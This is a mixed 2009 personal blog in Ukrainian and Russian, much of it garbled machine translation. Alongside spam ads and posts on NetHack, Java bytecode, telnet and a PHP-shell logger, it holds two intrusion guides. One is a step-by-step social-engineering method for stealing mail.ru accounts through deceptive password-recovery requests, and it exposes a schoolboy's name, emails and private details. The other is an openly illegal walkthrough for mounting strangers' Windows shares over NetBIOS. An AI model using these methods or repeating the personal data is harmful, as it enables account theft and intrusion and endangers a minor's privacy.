Блог програмиста 4-го курса ...

Сестренка

2010-01-24T10:00:00.000-08:00

Введення в СІ [Хакерство для новачків]

2009-10-07T05:45:00.001-07:00

Введення в СІ.
------------------------
Зміст:
1. СІ, коротко про все.
2. Психологія людини.
3. Методи одержання інформації.
4. Післямова.
-------------------------------------------------- ------------
------------------- СІ, коротко про все -----------------
-------------------------------------------------- ------------
Дорогі початківці хакери (і не початківці теж), я радий представити Вам свою статтю Соціальної Інженерії.
Що таке Соціальна Інженерія? В Інтернеті є багато описів сему слову, але
тільки хакер може зрозуміти це.
Перш за все СІ - вплив на людину психологічно, будь то простий самотня людина, просунутий юзер, нещадні оператори і адміни великих Інтернет-ресурсів. УСІ ВОНИ ЗАЛИШАЮТЬСЯ ЛЮДЬМИ! А це значить що всі вони уразливі до психологічного впливу.
Тобі, дорогий мій соратник, не треба копати літературу типу "Як загіпнотизувати людини через інтернет", "Як маніпулювати людьми" і т.п. СІ є така собі "Імпровізація ляльковода", при тому об'єкт не помічає ніякого маніпулятора над собою, він думає що він управляє собою і здійснює всі свої дії, аж ні!
Загалом, дорогий хакер, знаючи що об'єкт атаки - людина, знай, ти - маніпулятор і ляльковод.

-------------------------------------------------- ------------
------------------ Психологія людини ----------------
-------------------------------------------------- ------------

Якщо ти думаєш, що ти ляльковод і можеш робити з об'єктом як хочеш, то ти не прав. Маніпулювання не містить у собі грубе поводження. Воно може бути у наступному вигляді:
-Жаль
-Доброта
-Співчуття
-Обман
Кожен використовує це по-різному.
Пробачте за маленький розділ)

-------------------------------------------------- ------------
----------- Методи одержання інформації ----------
-------------------------------------------------- ------------

Отже, існують наступні методи:
-Підміна
-Почуття (див. Психологія людини)
-Соц. мережі

Розглянемо все на прикладі:
Об'єкт атаки - мій соратник "хакер" (хай вибачать мене всі хакери планети)
e-mail: trixls@rambler.ru

Чому мило? та тому що на цьому варто Контакт, Однокласники, і т.п.

Крок первий.Обдумиваем "наліт"

Для злому мила я використовую сервіс повернення паролів. Це спеціальний сервіс на mail.ru, де вказуєш докладно свої дані і якщо вони співпадають то тобі на іншу поштову скриньку надсилають новий пароль.
Створюємо липовий ящик типу "trixls@rambler.ru"
Отже, збором відомостей займемося ми з "Контакту" і "Мого Світу". І не забудьте зібрати інфу про друзів, які у нього в "Моєму світі"!

Крок другий. "Наліт"

Адреса http://win.mail.ru/cgi-bin/passremind?action=sendrequest&Username=default&Domain=mail.ru
Отже, заповнюємо всі дані, у місцях "пароль" і "секретне питання" пишемо зламали ((( "або" вкрали хакери! "
Поля з датами. Окрема тема. Коротше дату останнього заходу пишемо на цей день, а народження їсть ь в "МІЙ СВІТ" знову-ж)))
Де треба заповнити поле в самому низу "доп. Інфо", пишемо сумну історію, про те, як злі батьки заборонили вхід на всі, крім шановного й улюбленого мейл.ру і дівчина сидить тільки в агента і все ... Ну короче розписуємо багато за все, говоримо про друзів, які на "Мій світ" і т.п. вказуємо потрібні дані в цьому полі теж)
Пишемо другому адресу (імя_об'екта@другой_сервіс.ру)
Відправляємо

Крок третій. Отримання пароля

Отже, нам має прийти на липовий ящик наступне:
--- Здравствуйте.
Пароль до п / я trixls@mail.ru: bo4s8fsw (пароль я вже поміняв)))
Ми рекомендуємо Вам встановити новий пароль (http://www.mail.ru/pages/help).
Також рекомендуємо Вам змінити таємне запитання і відповідь на нього (http://www.mail.ru/pages/help/2.html #).
З повагою,
Служба підтримки користувачів
поштової системи Mail.ru

Якщо Вам прийшов "Недостатньо відомостей - користуєтеся моїм методом, а саме:

Зрозумійте мене правильно, прошу! Мій ящик зламали і поміняли відповідь на таємне
питання, тому я нічого не можу вказати! Ви ж теж люди! Це
максимум з усього того, що я знаю, решта поміняли!

І тоді-то Вам точно прийде пароль, перевірено на 10 людей. Результат 10 з 10!

-------------------------------------------------- ------------
--------------------- Післямова -------------------------
-------------------------------------------------- ------------

Отже, даний метод перевірений мною і написаний не тільки в ознайомлювальних цілях;)

Ось Вам листа для ознайомлювальних цілей:
--------------------
--------------------

Здравствуйте.

У вашому запиті на пароль до поштової скриньки trixls@mail.ru Ви повідомили наступні дані:
Ім'я: Олег
Прізвище: Салтиков
Cекретний питання:???
Відповідь на секретне питання: Поміняли
Пол: М
Вік:
Регіон: Росія
Місто: Солнечногорск
Дата реєстрації: 15-6-2008
Коментарі: trixls@mail.ru
Востаннє я змінював пароль вчора, а саме 30.08.09, але в мене однокласник займається зломом і я думаю це він зробив!
При реєстрації у мене був простий пароль, але його я не пам'ятаю, а відповідь на таємне запитання при реєстрації був "Топільська", це прізвище моєї матері, чого я не забуду.

Це мою поштову скриньку, у друзях у мене моя дівчина, Дарина Сучкова, 8142_94@mail.ru, один Едвін, він вболіває за спартак і челсі, сестра, ще один і Олена Третьякова! Едвін фанат Лемпарда як і я)

Програмують на Pascal, вчуся на 4 і 5, з першого вересня 09 года піду в 8-ий клас.

ВКонтакте.ру я видалив цю сторінку, про всяк випадок, не хочу, чтою зламали!

Сподіваюся Ви повірите мені, адже я зараз далеко від своєї дівчини, а батьки через покарання відкрили мені доступ тільки в mail.ru і blogs.mail.ru ...

Спасибо за ваш увагу, з повагою і надією на адміністрацію Олег Салтиков!

Для видачі пароля цих даних недостатньо.
За наданими Вами даними ми не можемо вислати Вам пароль.
Можливо, у Вашому запиті невірно вказано ім'я поштової скриньки або домен (mail.ru, inbox.ru, list.ru або bk.ru)
Якщо даний п / я був зареєстрований не Вами особисто - зверніться за цією інформацією до реєструвати його особі.
Для відновлення пароля, вкажіть, будь ласка, всю інформацію, введену при реєстрації:
- Ім'я а / с;
- Таємне запитання;
- Відповідь на нього;
- Місто;
- ПІБ.
Будь ласка, пригадайте:
- Приблизну дату реєстрації даного а / с;
- Який електронна адреса була вказана при його реєстрації;
- На яку адресу коштує в ньому пересилання (якщо така є);
- Які адреси можуть перебувати в адресній книзі в цьому а / с;
- Які папки крім стандартних створені в ньому;
- З яких IP-адрес зазвичай здійснювалися заходи в цей а / с;
- Приблизну комбінацію символів в паролі;
- Будь-яку іншу інформацію, що підтверджує Ваші права на цей а / с.

Цю інформацію введіть у формі для відновлення пароля
http://mail.ru/cgi-bin/passremind?action=sendrequest&Username=trixls&Domain=mail.ru

З повагою,
Служба підтримки користувачів
поштової системи Mail.ru

Злому (будемо порушувати закон) [Хакерство для новачків]

2009-10-07T05:40:00.001-07:00

Всем привет! Я пишу свою першу статтю на хакзоне, сподіваюся вона комунібуть стане в нагоді)) думаю з назви статті ви вже зрозуміли що за цей злом йде кримінальна відповідальність, і найгірше що ви навіть не знаєте на чий ПК ви потрапили, отже можете качати навіть секретні дані СБУ , і т.д. Але у цього злому є і свої плюси: вам не знадобиться майже ніякого софта. Весь софтвер надала нам кватирка, але все-таки одну прогу скачати вам знадобиться. Заходимо на сайт http / / www.xakep.ru і в рядку "пошук" пишемо "xSHaReZ" (без ковичек!!). З усього знайденого клікаємо по самій верхній, знаходимо сканер і качаємо. Для того, щоб злом пройшов успішно нам потрібно встановити клієнт мереж Майкрософт і протокол "NetBIOS". Це ви повинні вміти і самі. Сканер проводить сканування портів ваших жертв. Після загляньте в розділ "логи" і якщо ви побачите приблизно таке:

IP адреса 62.171.274.1
Назва компа: VASYA
Ім `я користувача за компом: MAKAROV
Робоча група: VASYA

то у вас є шанс. Тепер заходимо в Пусквиполнть і набираємо:
"nbtstat.exe - A ip.ad.re.ss" ip.ad.re.ss - той що видав сканер (у нас це 62.171.274.1) після кліка по вводу вікно доса видасть вам щось таке:

VASYA <00> UNIQUE
VASYA <15> UNIQUE
SERVER <00> GROUP
SERVER <1C> GROUP
SERVER <1E> GROUP
VASYA <05> UNIQUE
MAC Adress = 00-00-00-00-00-00

Тепер будемо шукати на кватирці файл "Imhosts". Відкриваємо пошук і шукаємо. Спочатку він порожній. Пишемо в нього "ip.ad.re.ss VASYA # pre". Зберігаємо. Знову йдемо в виконати і друкуємо: "netview VASYA". Якщо вам пощастило і ви побачите таке:

Share name Type
---------------------------------
MyDisk Disk
Obshiye Disk
Команда виконана успішна

Злом вдався. Якщо ж ні, то спробуйте все заново, а краще з іншим ПК. Але якщо вам пощастило і все пройшло успішно заходимо в виконати і пишемо:
"net use x: VASYAMyDisk". Все, його ПК ваш. Йдемо в "мій комп'ютер", у ньому з'явився новий диск "Х")).

2009-10-07T05:16:00.000-07:00

Любые виды переводов ... Перевод документов, технический перевод...
бюро переводов

Нарыл вот интересную штуку...

2009-10-07T04:56:00.000-07:00

Нашел сайт, база актеров ... На нем проводиться кастинг для участия в съемках :
Фильмов, рекламы, и прочего ...Вы можете спокойно в етом поучаствовать .
кастинги киев

2009-10-07T03:03:00.000-07:00

доска бесплатных объявлений
Можно разместить любое объявление .

Домик =)

2009-10-07T02:55:00.000-07:00

Представ те как хорашо бы было , купить недвижимость в Испании или Франции.
Особенно если етот домик на берегу побережья...

недвижимость в Испании

Ночь на пролет .

2009-10-07T02:43:00.000-07:00

Совсем недавно собрались с друзьями поиграть в покер ... У меня на дому собрались , купили в карты сидели играли но в скором времени нам ето очень надоело так как играли в дурака... Ктото из друзей предложил поиграть в покер ... Но мысль сразу была откинута так как ... Правил мы не знали .... Ну вот ... я нарыл правила игры в покер .
Дак мы потом сидели играли до 6-ти часов утра =) вот .

правила игры в покер для новичков

2009-10-04T14:18:00.000-07:00

RuClicks.com – биржа трафика – это отличная возможность заработать и привлечь посетителей на свой сайт.

Как биржа трафика RuClicks.com может помочь раскрутить свой сайт? Очень просто – здесь вы можете легко и быстро купить трафик по цене от 3 долларов за 1000 уникальных посетителей! Биржа предлагает посетителей из разных категорий, а так же по геотаргетингу. Вы можете купить посетителей даже из своего города.

Как заработать с RuClicks.com? Допустим, у меня есть сайт и я хочу заработать. Что я могу сделать:
1) Я могу добавить на сайт ссылки на продажу трафика. За каждого отправленного посетителя биржа начислит мне деньги, которые я смогу снять в любой момент при достижении минимальной суммы в 20 долларов на счету.
2) Я могу добавить на сайт ссылку на партнерскую программу RuClicks.com и я буду получать 5% от всех покупок, сделанных привлеченными рекламодателями.

На данный момент через биржу RuClicks.com каждый день продается почти миллион русскоязычных посетителей и это один из наиболее динамично развивающихся проектов рунета. Не упустите свою возможность!

Ссылка на сайт: http://www.ruclicks.com/

2009-10-04T14:01:00.000-07:00

Недавно купил се такую вот машыну =)

2009-10-04T13:52:00.000-07:00

Магазин запчасти - большой ассортимент в наличии, срочный заказ, на сайте используется уникальная поисковая система Price-AZ (искать запчасти можно на любые автомобили). Уникальность поисковой системы заключается в поиске не только по номеру но и по названию автозапчасти. При магазине есть небольшой автосервис...

Недавно с етого сайта заказал несколько запчастей
...
Отличие етой слыжбы в том что вышло на много дишевле чем на других сайтах ..
+ Ремонт вышел дишевле чем на СТО .
Советую обратить внемание на етот сайт если у вас есть машына ...
А вот и моя машынка :

Запчасти

Юридические услуги

2009-09-30T01:52:00.000-07:00

Магазин юридических услуг

Юредические услуги любого типа , от магазина юредических услуг.
готовые фирмы 2008

NetHack. Об игре

2009-09-16T02:23:00.001-07:00

Многие, уверен, знают эту замечательную игру и убили на нее не одну неделю своей жизни. По моему скромному мнению — это одна из лучших игр из ныне существующих.
Появилась она очень давно — в 1987 году, через семь лет после выхода Roque — прародителя нетхака и основателем жанра "rogue-подобных игр".
Nethack — самый яркий ее представитель.

И что же такого интересного и захватывающего в этой игре? — спросите вы. И я вам отвечу — возможности игры, графика, геймплей, сюжет.
Да-да. Вы не ослышались. Именно это и ценно в этой игре.

Графика

Основная проблема современных игр с современными требованиями — это нарисовать все то, что происходит. Я думаю, поэтому в современных играх нельзя взять чей-то труп и орудовать им, как оружием. Или взять гранатомет и использовать его в качестве дубинки. Или освежевать убитого дракона и натянуть на себя его шкуру.
Как это нарисовать? Как должен себя вести персонаж и окружение в таком случае? Не нарисуют, а если нарисуют, то схематически. Приходиться додумывать :)
В nethack'е эта проблема решена гениально — додумывайте все сами. Впрочем, это общая особенность всех ASCII-art игр.
«Видите, символ процента? Это еда. Она зеленая? Тогда это или труп лепрекона, или водоросли.» Собственно графическим адаптером выступит ваше воображение :)
Через некоторое время вы будете рефлекторно бояться пурпурной «L», ибо для вас это уже страшный монстр Архи-Лич, который проклянет ваш магический рюкзачок (что если не смерть, то жизнь высокой ценой) и практически не обращать внимание на ужей (newt) ползающих у вас под ногами в виде желтеньких двоеточий.
Конечно же есть графические версии этой игры. Даже про 3D слышал. Но это все — только мешает. Попробовать, конечно, стоит. Я, например, попробовал и вернулся назад к любимому ASCII-art.

По просьбам читателей. Графическая версия выглядит вот так:

Кстати, еще есть изометрические графические версии: заброшенная Falcon's Eye и ныне здравствующая Vulture's Eye. (Infernalподсказал)

Сюжет

Сюжет прост до безобразия. Вы, искатель приключений, спускаетесь в глубокое-глубокое подземелье в поисках амулета Йендора. Спустись, возьми, принеси и получи вечную жизнь в подарок. Хеппи энд.
Сюжет не отвлекает от игрового процесса и абсолютно не указывает вам что нужно делать сиюминутно. И это самое главное.
И, в качестве бонуса у вас будет один единственный квест (уникальный для типа персонажа), по окончанию которого получаете замечательный актефакт… Какой? It depends
Одна игра — одна цель. Ничего лишнего.

Геймплей и возможности игры

Мышь в первоначальной версии не участвовала вовсе, ибо не все компьютеры на момент выхода игры были с мышью. Позже, конечно сделали примитивную поддержку мыши, но даже не знаю зачем — она там вовсе не нужна. Все управление осуществляется с помощью клавиатуры, причем практически всей клавиатуры (думаю, не удивил).
В отличие от типичных представителей RPG, эта игра происходит в пошаговом режиме, чем невольно вызывает ассоциацию с шахматами. Что-то произошло — не спешите жать на кнопки. Посмотрите на текущие возможности, поразмышляйте. Совсем туго — сохранитесь и отложите важное решение до завтра (благо уже четыре утра на часах и вы уже часов эдак восемь играете не отрываясь :)

Типичная ситуация: ваш персонаж в трех шагах от смерти. Стоит рядом агрессивно настроеный жирный тролль, который и не собирается умирать. Типичная RPG предлагает на ваш выбор весьма скудный набор действий: дерись до смерти, бутылочка жизни и дерись до смерти или беги со всех ног.
А в нетхаке набор решений ситуации безграничен. Можно, например взять волшебную палку-копалку (wand of dig) и колдонуть под ноги. Провалимся на этаж ниже, зато выживем. Или взять маркер и написать на полу волшебное слово «Elbereth». Ни один монстр не смеет ступить на эту надпись. Или вообще — использовать заклинание полиморфа на монстра и надеятся, что он превратиться в что-то маленькое и жалкое. Или, достать из заначки труп кокатриса и вмазать тролю что есть силы. Кокатрис превращает в камень всех, до кого дотронется (надеюсь, ваш персонаж надел перчатки?). Вместо тролля у вас будет статуя тролля. Живем дальше. Свиток телепортации тоже весьма эффективно спасет вас он немируемой гибели. Телепортируйтесь подальше. Оденьте кольцо невидимости. И ваш персонаж тихонечко уберется зализывать раны. Прочитайте свиток земли (scroll of earth) на тролля свалится огромный валун. Читайте свиток геноцида (scroll of genocide) и уничтожте всех троллей. Помолитесь, наконец своему божеству (alt + p)! Бог услышит ваши молитвы и восстановит вам здоровье на правах чуда. Впечатляет?

Сохраняйтесь почаще

Все эти потуги оправданы, ибо самое мощное заклинание всех времен и народов «save and load» не работает, как и в diablo, например. Только «сохраниться и выйти». И, как в диабло на хардкоре, персонаж может умереть лишь один раз :) Крепко задумайтесь, прежде чем что-либо сделать. Это может оказаться фатальным для вашего персонажа!

Знание английского и переводы

Было сделано куча попыток русифицировать nethack, дабы сделать его более популярным среди русскоязычного населения. Но пара ночей и красные глаза позволят вам свободно ориентироваться в английской версии. Могу только дать совет ставить сразу английскую версию, и переводить все, что непонятно со словарем. Сложности с языком испытываешь первых десять смертей.
Тем, кто все-таки решился на русский нетхак — вот вам ссылка. Русский неполноценный, вперемешку с английским, но все же есть. Но, умоляю! Попробуйте в английскую! :)

Ссылки

На последок — порция ссылок на все случаи жизни.

* Официальный сайт игры
* Нетхако-вики
* Сообщество живого журнала «nethack_ru»
* Русская википедия о нетхаке со своей порцией ссылок
* Английская википедия о нетхаке со своей порцией ссылок
* Спойлеры. (самая полезная ссылка, после того как разобрался с управлением)

Понравилось? Тогда продолжение следует.

Бесславно убит продавцом магазина. Поделом! Не нужно было дверь ногой вышибать :)
Если сообщество оценит — напишу еще что-нибудь.
P.S.В «Игры» бы перенести... Спасибо. Перенес в «Игры»

Навіщо Білайну Камаз за 5 мільйонів?

2009-09-16T02:19:00.001-07:00

Коли в одній невеликій точці на карті збирається стотисячний натовп, за нею треба око та око, а то накоїв ще чого-небудь - потім клопоту. От і доводиться нашим правоохоронцям, про доблесть яких ходять легенди, приїжджати туди і стежити своїми пильними очима за тим, щоб все було добре. Та й медики не залишаються осторонь: ці чудові люди в білих халатах складають компанію панам в сірій формі на той випадок, якщо комусь раптом стане не дуже добре. Але це тільки вершина айсберга! Насправді, на заходах, подібних до реконструкції Бородінської битви, яка відбулася 6 вересня в ста кілометрах від Москви, працюють тисячі інших людей, які роблять багато різних корисних справ, щоб усім, хто приїхав туди відпочити, було максимально комфортно. У їх рядах можна було зустріти також і двох людей у чорно-жовтих куртках на білому Камаз вартістю п'ять мільйонів рублів.

У стороні від основних гулянь, в чистому полі ці двоє розмістили першу і поки єдину в Росії мобільний базову станцію, що забезпечує в місцях скупчення людей до 200 додаткових каналів голосового зв'язку в один момент часу. Проходив повз люди навряд чи здогадувалися про призначення вантажівки зі зростаючою з нього 17-метрової щоглою, і лише ті, хто курсував зовсім поруч, могли помітити на його бортах емблеми компанії Білайн і сказати глибокодумно: «Ах от чому в мене такий гарний прийом!»

Строго кажучи, згаданих грошей коштує, звичайно, не сам Камаз (для довідки: новенький камаз коштує близько 1 млн. руб), і навіть не здоровенний білий контейнер позаду кабіни, а те, що знаходиться всередині нього: стійки з комунікаційним обладнанням Ericsson і Alcatel , а також антени, що ростуть з даху.

З «похідного» стану в робочий МБС може перейти приблизно за годину: у боку висуваються гідравлічні упори, шасі вирівнюється, далі починається інтеграція привезеного обладнання та існуючої мережі. Вибір способу зв'язку цілком і повністю залежить від умов, в яких опинився високотехнологічний Камаз: автоматика може самостійно навестися і налагодити передачу даних через супутник, через релейну антену або навіть за допомогою лазера. Правда, максимальна відстань, на якому можна ефективно використовувати лазер, - порядку півтора кілометрів.

Природно, для забезпечення безперервного зв'язку на 200 голосових лініях одночасно потрібно досить багато енергії, а тому оператори мобільного базової станції насамперед шукають місцеве джерело електрики. Але навіть якщо його не вдається знайти, вони не журяться довго, тому що на МБС встановлений дизельний генератор, а поруч з ним стоїть 700 літрова каністра з дизельним паливом, та й у баках у Камаза теж не 95-й бензин, так що час автономної роботи такої станції досягає двох тижнів, а то й більше. В цьому випадку мова йде про те, скільки витримає екіпаж: у наявності хоч і є два спальних місця, розраховані вони більше все-таки на нетривалі терміни.

Постає питання, навіщо я вам це розповідаю вдруге, якщо презентація цієї ж самої мобільної базової станції пройшла в минулому році? Справа в тому, що тоді тільки проводилися її випробування, і виходили різні дозволи. А зараз - це вже цілком працездатний зразок, який побував у кількох «гарячих точках».

Чи варто чекати відповіді від інших операторів на введення в експлуатацію першого МБС Білайну, поки сказати складно. МТС ні про що таке не заявляла, а в Мегафоні взагалі вважають подібні розробки безперспективними. Але факт залишається фактом: на минулому святі найбільш мобільними себе відчували абоненти жовто-смугастих, радісно повідомляючи оточуючим про наявність впевненого прийому і про відсутність збоїв в мережі.

Вахтер: на сторожі системи

2009-09-16T02:15:00.001-07:00

«Одного разу, в холодну зимову пору,
Залили на сервер бекдорчіков гору ... »

Народне адмінское творчість

Вобщем як то раз на одному з серверів виявився php-shell, через який злобні хакери зламали затишний дневничок ™ хорошої людини.
Після двогодинного колупання в логах Апача знайшлася діра, через яку залили шелл.
Діру прикрили, дневничок повернули до життя з резервних копій, і сіли думу думати.

Після третьої пляшки пива народилася ідея: «А чому б не відловлювати виконання системних викликів з php скриптів?».
Сенс у тому, що більшість php-Шелл так чи інакше використовують функції exec ();, system ();, shell_exec (); або passthru ();. Відповідно до виконання цих функцій можна перехопити і тихенько в лог записати, що такого-то числа такий-то скрипт на такий-то рядку викликав функцію exec () з параметром «rm-rf /».
Сказано-зроблено. Доброму людині kastigar було поставлено тех. завдання і робота закипіла.
Вже як він расковирівал тонкощі Zend Engine я розповідати не буду, але врешті-решт народилося розширення для PHP4/PHP5 під кодовим ім'ям BAXTEP.
Спочатку ми не планували викладати код в загальний доступ, бо писалося все загалом і в цілому «для себе» і «від і до» не тестувалося, але дух open source все-таки взяв своє - і исходники були викладені на GoogleCode.

Структура байт-коду віртуальної машини Java

2009-09-16T02:11:00.002-07:00

Останнім часом на Хабре з'явилися статті які зачіпають маніпуляцію байт-коду. Що змусило мене опублікувати дотримуюся статтю присвячену його структурі.

У платформи java є дві особливості. Для забезпечення платформ програма спочатку компілюється в проміжна мова низького рівня - байт-код. Друга особливість завантаження виконуваних класів відбувається за допомогою розгортаються classloader. Це механізм забезпечує більшу гнучкість і дозволяє модифікувати виконуваний код при завантаження, створювати і довантажувати нові класи під час виконання програми.

Така техніка широко застосовується для реалізації AOP, створення тестових фреймворк, ORM. Особливо хочеться відзначити terracotta, продукт з гарною ідеєю кластеризації jvm і на всю котушку використовує модифікації байт-коду. Ця замітка буде присвячена огляду структури байт-коду, першій частині цієї сильної зв'язки.

Кожному класу в java відповідає один скомпільованій файл. Це справедливо навіть для підкласів або анонімним класів. Такий файл містить інформацію про ім'я класу, його батьки, список інтерфейсів які він реалізує, перерахування його полів і методів. Важливо відзначити, що після компіляції інформації що містить директива import втрачається і всі класи іменуються тепер через повний шлях. Наприклад в місце String буде записано java / lang / String.

Найцікавіше як будуть виглядати методи класу в байт-коді. Будемо спостерігати во, що трансформується наступний клас:

package org;

class Test (
private String name;

public String getName () (
return name;
)

public void setName (String name) (
this.name = name;
)
)

Почнемо з заголовка. У ньому міститься інформація про назву методу те, що метод викликається без параметрів і тип повертається аргументу.

Байт-код стекол-орієнтована мова, схожий за своєю структурою на асемблер. Що б провести операції з даними їх спочатку потрібно покладе на стек. Ми хочемо взяти полі у об'єкт. Що б це сделять потрібно його покласти в стек. У байт-коді немає імен змінних, у них є номери. Нульовий номер у посилання на поточний об'єкт або у зміною this. Потім йдуть параметри для виконання методу. Потім інші змінні.

Команда ALOAD 0 кладе змінну this на стек. Що б на стек покласти тип даних, відмінний від посилання потрібно скористатися іншою командою. Для long буде LLOAD, а для doubles [] буде DALOAD.

Наступна команда GETFIELD, прибирає зі стека посилання на об'єкт і кладе примітивний тип або посилання на поле даного об'єкта. У неї є два параметри. Перший ім'я класу, друге ім'я змінної. Якщо ж змінна статична, то попередньо класти на стек нічого не потрібно, а команду потрібно замінити на GETSTATIC з темі ж параметрами.

Остання команда говорить, що метод завершений і повертає значення типу посилання зі стека.

Сетер має трохи більш складну структуру.

public setName (Ljava / lang / String;) V
ALOAD 0
ALOAD 1
PUTFIELD org / Test name
RETURN

Даний метод нічого не повертає. Перші дві команди кладуть на стек змінну this і параметр для виконання методу. Потім викликається команда PUTFIELD (PUTSTATIC для статичного поля) яка встановить значення поля об'єкту і прибере зі стека останні два значення. Остання команда вихід з методу.

Додамо до нашого об'єкт ще пару методів і подивимося який байт-код їм відповідає.

public void forTest (Boolean b) (
System.out.prinln (b);
)

public Long testMethods (Collection testInterface) (
Long a = System.curretM ();
forTest (testInterface.contains (a));
return a;
)

testMethod має такі уявлення.

INVOKESTATIC java / lang / System currentTimeMillis () J
LSTORE 2
ALOAD 0
ALOAD 1
LLOAD 2
INVOKESTATIC java / lang / Long valueOf (J) Ljava / lang / Long;
INVOKEINTERFACE java / util / Collection contains (Ljava / lang / Object;) Z
INVOKESTATIC java / lang / Boolean valueOf (Z) Ljava / lang / Boolean;
INVOKEVIRTUAL org / Test forTest (Ljava / lang / Boolean;) V
LLOAD 2
INVOKESTATIC java / lang / Long valueOf (J) Ljava / lang / Long;
ARETURN

Перша команда викликає статичний метод у класу System. Друга запам'ятовує результат виклику методу currentTimeMillis у змінній з другим номером. Потім ми кладемо змінну this, параметр методу і змінну з номером 2 на стек. Перетворять змінну до типу java / lang / Long. І перевіряємо, що вона в нас міститься в колекції, викликаючи метод у параметра виконується. У нас параметр інтерфейс, тому застосовується команда INVOKEINTERFACE. Для методу класу необхідно використовувати INVOKEVIRTUAL. Що б викликати метод у об'єкт або інтерфейсу необхідно, що б на стеку лежав об'єкт, потім параметри методу що викликається. У результаті виклику методу вони замінюватися на результат або просто заберуться з стека, якщо метод нічого повертає. Остання три команди кладуть зміну на стек, перетворюють її на об'єкт і повертають її як значення методу.

Що б завершити наш екскурс в байт-код додамо останній метод і подивимося на цикли і умовні оператори.

public void testAriphmentics () (
int i = -17;
while (i <10) (
if (i <0) (
i = i + 7;
)
i = i * 13;
)
)

Він в байт-коді буде виглядати так

ACC_FINAL -17
ISTORE 1
Label: L1466604866
ILOAD 1
ACC_FINAL 10
IF_ICMPGE L329949514
ILOAD 1
IFGE L658705244
ILOAD 1
ACC_FINAL 7
IADD
ISTORE 1
Label: L658705244
ILOAD 1
ACC_FINAL 13
IMUL
ISTORE 1
GOTO L1466604866
Label: L329949514
RETURN

Перші дві команди ініціалізує змінну i (з номером 1) значенням -17.

Далі у нас починається тіло циклу. Для реалізації якого буде потрібно мітки,
команда переходу і умовний оператор. У тілі нашого методу аж цілих три позначок. Перша позначка означає початок циклу. Друга потрібна для умовного оператора, а остання знаменує кінець циклу. Умовного оператор має один параметр мітку переходу. Перед тим, як його викликати сравніваеми значення повинні лежати на стеку. Для порівняння з нулем використовується окрема команда. Для кожного типу є свій оператор порівняння. Для int він IF_ICMPGE. Після порівняння сравніваеми значення забираються зі стека. Для арифметичних дій з двома змінним їх так само як і для умовного оператора потрібно попередньо покласти на стек. Після виконання вони знімаються з стека, а на їх місце кладеться результат.

На це короткий екскурс в байт-код закінчено, деякі питання такі як виключення, синхронізація не були порушені. Я сподіваюся, що маючи уявлення про байт коді читач легко впоратися з ними. У наступній частині ми розглянемо інструменти які застосовуються для модифікації байт-коду.

http://math-and-prog.blogspot.com

Питання безпеки у веб-технологіях / Microsoft відмовилася патчити Windows XP

2009-09-16T02:11:00.001-07:00

від Хабрахабр: автор: alizar
Кількість користувачів, яким сподобалася ця запис: 4
На подив фахівців з безпеки, компанія Microsoft відмовилася патчити недавно виявлену уразливість TCP / IP у Windows XP і Windows 2000. Один з провідних менеджерів з безпеки програм Microsoft Едріан Стоун сказав, що цей фрагмент исходников занадто старий, має вік від 12 до 15 років, і розібратися в коді на цьому рівні «просто нереально» [backporting that level of code is essentially not feasible]. Ця фраза була сказана в прямому ефірі щомісячного вебкаста з безпеки (стенограма), відповідаючи на запитання слухачів.

Два бага в стеку TCP / IP були виявлено 8 вересня. Уразливість зачіпає також Windows Vista, Windows Server 2003 і Windows Server 2008. Для трьох згаданих систем вийшов апдейт MS09-048, а от до Windows 2000 і Windows XP патча можна не чекати. Для захисту від шкідливих TCP / IP-пакетів користувачам Windows XP рекомендовано скористатися функціоналом вбудованого файрвола.

Потрібно нагадати, що Windows XP - найпопулярніша в світі ОС на сьогоднішній день. За умовами угоди для користувачів, Microsoft зобов'язана випускати апдейти безпеки для Windows XP аж до квітня 2014 р., пише Computerworld.

Відмова патчити знайдену уразливість для системи, яка знаходиться на підтримці - досить рідкісне явище. За словами Стоуна, останній раз Microsoft йшла на такий крок у березні 2003 року з Windows NT 4.0.

Блог

2009-09-16T02:08:00.000-07:00

ВІн знову оживе !!

#@*(#(&@@#!$%#^@&

2009-05-14T08:35:00.000-07:00

Блог временно необновляетса так как нет технической возможности !
ЕТо ненадолго

Telnet ?

2009-05-01T08:30:00.000-07:00

В Telnet, как правило, вкладывают два смысла. Во первых Telnet — это протокол эмуляции терминала, через который осуществляется удаленный доступ в Internet. А во вторых, telnet это программа UNIX с аналогичными функциями (пишется с маленькой буквы, ибо в UNIX это важно). Запустив такую программу, вы увидите на экране своего монитора удаленный терминал. Все это может быть реальностью только за деньги, То есть вы должны получить доступ в Internet на уровне Dial-up. Впрочем, в Internet существуют сервера, которые предоставляют бесплатный ограниченный доступ через Telnet к некоторым базам данных.

Программа telnet через определенные команды позволяет управлять параметрами сеанса связи только через командный режим. Это означает, что сначала вы коннектитесь с удаленным хостом и после того как нажимаете escape-последовательность, попадаете в командный режим telnet. Сеанс связи поддерживается как вашим софтом, так и софтом удаленной машины. Если копать глубже, то связь осуществляется через протокол TCP посредством пакетов UDP.

Таким образом Telnet это:

● регистрация на удаленном компьютере;

● использование софта Internet, в том числе клиентских программ на удаленном компьютере.

● запуск доступного софта на удаленном компьютере.

Далее мы будем разбирать Telnet на основе программы NCSA Telnet. Этот софт предоставляет интерактивный доступ с писишного компьютера к телнетовским серверам сети TCP/IP.

NSCA Telnet

Многие, говоря о Telnet, подразумевают UNIX. А те, кто считают, что знают UNIX, работают в Internet через Telnet. Мы уходим от тех и от других. На время. Мы погрузимся в старый добрый DOS, так как NCSA Telnet работает в стандартной MS DOS.

Запуск NCSA Telnet осуществляется после ввода следующей команды:

telnet hostname

Если все набрано правильно, то вы соединитесь с хостом hostname. Этот хост попросит вас ввести регистрационное имя и пароль.

NCSA Telnet эмулирует терминал VT100. Но операционка удаленного хоста не может определить тип вашего терминала. Вы должны определить его сами. Для удаленных UNIX-компьютеров введите:

newton% set term=vt100;tset

Выход из NCSA Telnet зависит от того количества сессий, которое вы имеете в данный момент. То есть, вы должны разорвать связь с каждым хостом.

Результатом ваших действий должно быть обычное приглашение вашей операционки.

Вы также можете завершить сеанс через комбинацию клавиш Alt-X. Эта команда закрывает только текущую сессию.

Лучшие клавиатурные эквиваленты

● Alt-A Дополнительная сессия.

● Alt-N Следующая сессия.

● Alt-D Перехватить активный текст и послать его в файл.

● Alt-Z Сделать сессию невидимой, но
активизированной.

● Alt-E Выйти в оболочку DOS.

● Alt-G Графическое меню.

● Alt-C Включить/отключить режим перехвата.

● Alt-R Отключить экран VT100.

● Alt-H Подсказка.

● Alt-Y Прервать процесс.

● Alt-B Предыдущая сессия.

